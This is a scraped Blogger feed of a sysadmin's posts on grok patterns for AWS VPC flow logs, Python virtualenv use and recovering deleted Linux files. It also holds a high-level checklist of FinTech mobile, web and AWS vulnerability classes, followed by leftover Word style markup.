<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFtdQybmp0yqures-I7gyP4QoO1IfgSsTo7CrcoGcQvccm4_Memhu9hKYggo3Ekd7pKhqGBrkxo6ccoS-A_zKaEHJ4WMkJsaZVhey4t6SinQ7wXuu6LZv8rgtLJWgOf9c2rgQ9KZE5ZRYw/s1600/grokdebug_mine.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1492" data-original-width="1566" height="380" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFtdQybmp0yqures-I7gyP4QoO1IfgSsTo7CrcoGcQvccm4_Memhu9hKYggo3Ekd7pKhqGBrkxo6ccoS-A_zKaEHJ4WMkJsaZVhey4t6SinQ7wXuu6LZv8rgtLJWgOf9c2rgQ9KZE5ZRYw/s400/grokdebug_mine.png" width="400" /></a></div>
<br />
Test using grokconstructor<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyUZtQSg0vMT5HZQPg8E2J7UNO7qOf_kBGLhbC3bX8_1fqqhbarUZR9nVEv7u_APWR8eApvvS4Dn01rDBrTbKBOP7sLrUABn4yg7p7S_I4BUMJP3n59BTsImZpY1BU5EVWB_w5FM35Hb6_/s1600/grokconstructor_mine.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1327" data-original-width="1600" height="331" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyUZtQSg0vMT5HZQPg8E2J7UNO7qOf_kBGLhbC3bX8_1fqqhbarUZR9nVEv7u_APWR8eApvvS4Dn01rDBrTbKBOP7sLrUABn4yg7p7S_I4BUMJP3n59BTsImZpY1BU5EVWB_w5FM35Hb6_/s400/grokconstructor_mine.png" width="400" /></a></div>
<br />
You can also consider INT instead of NONNEGINT<br />
<br />
<br />
Found few patterns by googling which looked like below, were not working on grokconstructor website.<br />
<span style="font-family: Courier New, Courier, monospace;">%{NUMBER:version} %{NUMBER:account-id} %{NOTSPACE:interface-id} %{NOTSPACE:srcaddr} %{NOTSPACE:dstaddr} %{NOTSPACE:srcport:int} %{NOTSPACE:dstport:int} %{NOTSPACE:protocol:int} %{NOTSPACE:packets:int} %{NOTSPACE:bytes:int} %{NUMBER:start:int} %{NUMBER:end:int} %{NOTSPACE:action} %{NOTSPACE:log-status}</span><br />
<br />
Tested on grokdebugger<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhz1uUTqbwflI21ZeDgfFscE9boAEx7eu1AfsfTG8htBU8U_fjkRAMRAIyhiaj5yAiGmg03HCgRprJsHuxTKUT2nDi-glgeAL3tT19O-BVbsluOgalaaEeyLco-3zoAmcw6BTfW3JO-Npcr/s1600/grokdebug_googling.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1514" data-original-width="1550" height="390" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhz1uUTqbwflI21ZeDgfFscE9boAEx7eu1AfsfTG8htBU8U_fjkRAMRAIyhiaj5yAiGmg03HCgRprJsHuxTKUT2nDi-glgeAL3tT19O-BVbsluOgalaaEeyLco-3zoAmcw6BTfW3JO-Npcr/s400/grokdebug_googling.png" width="400" /></a></div>
<br />
<br />
Tested on grokconstructor<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXiy4ouo9AwfMKdlhppsOqBonH6pb9CuffC2aGEmFEiHoSh1y_LtQAuPfE2GHIEQE1FYtKrTeAxWvsmkXbPsFHjB6tYMIiQQ87woY2-JC-RkjACVGzeNzLaehwVFgeeRJEoT40Exh4qAIh/s1600/grokconstructor_googling.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1332" data-original-width="1600" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXiy4ouo9AwfMKdlhppsOqBonH6pb9CuffC2aGEmFEiHoSh1y_LtQAuPfE2GHIEQE1FYtKrTeAxWvsmkXbPsFHjB6tYMIiQQ87woY2-JC-RkjACVGzeNzLaehwVFgeeRJEoT40Exh4qAIh/s320/grokconstructor_googling.png" width="320" /></a></div>
<div>
<br /></div>
<div>
We can use the extracted variables from grok filter plugin in Kibana search or enhance data using logstash filter plugins geoip, dns, date etc.</div>
<div>
<br /></div>
Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com4tag:blogger.com,1999:blog-1852980805947568568.post-84284775406075893152018-01-20T06:09:00.003+05:302018-01-20T06:38:28.881+05:30Working in or using Python virtualenvInstall Python virtualenv on Ubuntu using below command<br />
<span style="font-family: "courier new" , "courier" , monospace;">apt-get -y install python-virtualenv</span><br />
<br />
Create virtualenv<br />
<span style="font-family: "courier new" , "courier" , monospace;">$virtualenv test_env1</span><br />
New python executable in test_env1/bin/python<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">$. test_env1/bin/activate</span><br />
Or<br />
<span style="font-family: "courier new" , "courier" , monospace;">$source test_env1/bin/activate</span><br />
<br />
Exit virtualenv<br />
<span style="font-family: "courier new" , "courier" , monospace;">$deactivate</span><br />
<br />
Switch between virtualenv’s<br />
<span style="font-family: "courier new" , "courier" , monospace;">$workon test_env2</span><br />
<br />
List all available virtualenv’s<br />
<span style="font-family: "courier new" , "courier" , monospace;">$workon</span><br />
<br />
<br />
virtualenvwrapper comes with few handy commands<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">$pip install virtualenvwrapper</span><br />
<br />
virtualenvwrapper supports extra commands like<br />
<span style="font-family: "courier new" , "courier" , monospace;">mkvirtualenv</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">cdvirtualenv</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">rmvirtualenv</span><br />
<div>
<br /></div>
Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com3tag:blogger.com,1999:blog-1852980805947568568.post-53174523226042954102017-12-23T02:49:00.000+05:302017-12-23T02:49:13.241+05:30Linux: Recovering files deleted using "rm -rf"<br />Removed python script file by accident. Following two methods worked for me in retrieving the file.<div>
<br /></div>
<div>
Trick 1:</div>
<div>
This was posted on askubuntu.com</div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">$grep -a -B 40 -A 80 'string_from_file' /dev/sda1 > save_here.txt</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span><b>-A 100</b> save 80 lines after match<br /><b>-B 40</b> save 40 lines before match<br /><b>string_from_file</b> at least one unique string you remembered from deleted file<br /><b>save_here.txt </b> retrieved content is copied here<br /><br />Trick 2:</div>
<div>
<span style="font-family: Courier New, Courier, monospace;">$lsof | grep -i "/path/to/file"</span><br />progname <b>1234</b> user_name <b>44</b> 8,1 43219876 432890 /path/to/file <br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">$cp /proc/<b>1234</b>/fd/<b>44</b> /restore/file/tothis/path</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
Retrieved files might have unnecessary data or few lines might be arranged in reverse order.</div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<br /></div>
Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com0tag:blogger.com,1999:blog-1852980805947568568.post-71805244254016415442017-10-17T02:41:00.003+05:302017-10-17T02:41:59.445+05:30FinTech, Mobile Applications and Vulnerabilities<div class="MsoNormal">
<br /></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b style="mso-bidi-font-weight: normal;"><span lang="EN-US" style="mso-ansi-language: EN-US;">MOBILE APPLICATION VULNERABILITIES<o:p></o:p></span></b></div>
<div class="MsoNormal">
<b style="mso-bidi-font-weight: normal;"><span lang="EN-US" style="mso-ansi-language: EN-US;">Reverse Engineering</span></b><span lang="EN-US" style="mso-ansi-language: EN-US;">: Applications published on Google Play or
Apple App Store can be reverse engineered by malicious users and create similar
applications. Companies can lose their intellectual property.<o:p></o:p></span></div>
<div class="MsoNormal">
<b style="mso-bidi-font-weight: normal;"><span lang="EN-US" style="mso-ansi-language: EN-US;">Insecure Data Storage</span></b><span lang="EN-US" style="mso-ansi-language: EN-US;">: FinTech related applications save
sensitive data like personally identifiable information (PII), card data (PCI),
health information etc. Sensitive personal information saved on mobile should
be encrypted.<o:p></o:p></span></div>
<div class="MsoNormal">
<b style="mso-bidi-font-weight: normal;"><span lang="EN-US" style="mso-ansi-language: EN-US;">SSL Pinning bypass</span></b><span lang="EN-US" style="mso-ansi-language: EN-US;">: SSL Pinning will<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">One Time Password:
OTP is used as second level of authentication.<o:p></o:p></span></div>
<div class="MsoNormal" style="text-indent: 36.0pt;">
<b style="mso-bidi-font-weight: normal;"><span lang="EN-US" style="mso-ansi-language: EN-US;">OTP Spamming</span></b><span lang="EN-US" style="mso-ansi-language: EN-US;">: OTP Spamming is requesting an
API/URL which generates OTP by spoofing mobile number to victims phone number.
If there is no proper validation, attacker can send many OTP SMS’s to victim
phone<o:p></o:p></span></div>
<div class="MsoNormal" style="text-indent: 36.0pt;">
<b style="mso-bidi-font-weight: normal;"><span lang="EN-US" style="mso-ansi-language: EN-US;">OTP Bypass</span></b><span lang="EN-US" style="mso-ansi-language: EN-US;">: <o:p></o:p></span></div>
<div class="MsoListParagraphCxSpFirst" style="margin-left: 90.0pt; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-US" style="mso-ansi-language: EN-US; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-fareast-font-family: Calibri; mso-hansi-font-family: Calibri;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="EN-US" style="mso-ansi-language: EN-US;">Modifying
checks: OTP validation can be bypassed by modifying checks in the request
payload or URI parameters<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 90.0pt; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-US" style="mso-ansi-language: EN-US; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-fareast-font-family: Calibri; mso-hansi-font-family: Calibri;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="EN-US" style="mso-ansi-language: EN-US;">Bypassing
SS7<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpLast" style="margin-left: 90.0pt; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -18.0pt;">
<!--[if !supportLists]--><span lang="EN-US" style="mso-ansi-language: EN-US; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-fareast-font-family: Calibri; mso-hansi-font-family: Calibri;"><span style="mso-list: Ignore;">-<span style="font: 7.0pt "Times New Roman";">
</span></span></span><!--[endif]--><span lang="EN-US" style="mso-ansi-language: EN-US;">Malicious
mobile apps sniffing OTP’s<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b style="mso-bidi-font-weight: normal;"><span lang="EN-US" style="mso-ansi-language: EN-US;">WEB APPLICATION VULNERABILITIES<o:p></o:p></span></b></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">All OWASP
Top 10 or SANS Top 25 Vulnerabilities will be applicable.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">- Cross
Site Scripting (XSS): If the input values from user is not validated it might
lead to java script execution vulnerabilities which might lead to cookie theft,
redirection to malicious websites, DDoS attacks on other sites etc..<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">- SQL
Injection: Improper input validation might lead to SQL Injection.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">Privilege
Escalation: If the authorization is not enforced properly, one user can access
other users data.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">- Authentication
bypass<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"><span style="mso-tab-count: 1;"> </span>SQL Injection<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"><span style="mso-tab-count: 1;"> </span>Session ID Guessing<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"><span style="mso-tab-count: 1;"> </span>Cookie values <o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">- Command
Execution: Improper input validation might lead to OS command execution<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">- Serialization/Deserialization:
Data interpreted as code because of improper validation. This might lead to
code execution in Java, PHP, Python<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">- CSRF<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">- WAF
Bypass<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">- Ratelimiting
Issues<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"><span style="mso-tab-count: 1;"> </span>Important API’s<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"><span style="mso-tab-count: 1;"> </span>Forgot/Reset Password<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"><span style="mso-tab-count: 1;"> </span>Login page<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"><span style="mso-tab-count: 1;"> </span>Other important/sensitive API’s<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">- XXE (XML
External Entity) Attack<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">- SSRF
(Server Side Request Forgery)<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">- JSON
Injection<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">- DoS/DDoS
(Layer 3, Layer 4 and Layer 7 attacks)<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b style="mso-bidi-font-weight: normal;"><span lang="EN-US" style="mso-ansi-language: EN-US;">AWS INFRA<o:p></o:p></span></b></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">- Public S3
buckets: Will have files<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">- Public
EBS Volumes: Might have sensitive information like SSH Keys, Server Keys,
passwords etc.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">- No Multi
Factor Authentication (MFA, 2FA) to AWS<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">- Root
logins<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">- Token
Disclosure<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"><span style="mso-tab-count: 1;"> </span>Slack<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"><span style="mso-tab-count: 1;"> </span>Git<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b style="mso-bidi-font-weight: normal;"><span lang="EN-US" style="mso-ansi-language: EN-US;">MISCELLANEOUS<span style="mso-tab-count: 1;"> </span><o:p></o:p></span></b></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">Crypto
Currency based exploitation in future<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">Sub-domain
takeover<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">Vulnerabilities
in protocols<o:p></o:p></span></div>
<!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
<o:PixelsPerInch>96</o:PixelsPerInch>
</o:OfficeDocumentSettings>
</xml><![endif]-->
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-GB</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="false"
DefSemiHidden="false" DefQFormat="false" DefPriority="99"
LatentStyleCount="382">
<w:LsdException Locked="false" Priority="0" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 9"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="header"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footer"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index heading"/>
<w:LsdException Locked="false" Priority="35" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of figures"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope return"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="line number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="page number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of authorities"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="macro"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="toa heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 5"/>
<w:LsdException Locked="false" Priority="10" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Closing"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Signature"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="true"
UnhideWhenUsed="true" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Message Header"/>
<w:LsdException Locked="false" Priority="11" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Salutation"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Date"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Block Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Hyperlink"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="FollowedHyperlink"/>
<w:LsdException Locked="false" Priority="22" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Document Map"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Plain Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="E-mail Signature"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Top of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Bottom of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal (Web)"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Acronym"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Cite"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Code"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Definition"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Keyboard"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Preformatted"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Sample"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Typewriter"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Variable"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Table"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation subject"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="No List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 1"/>
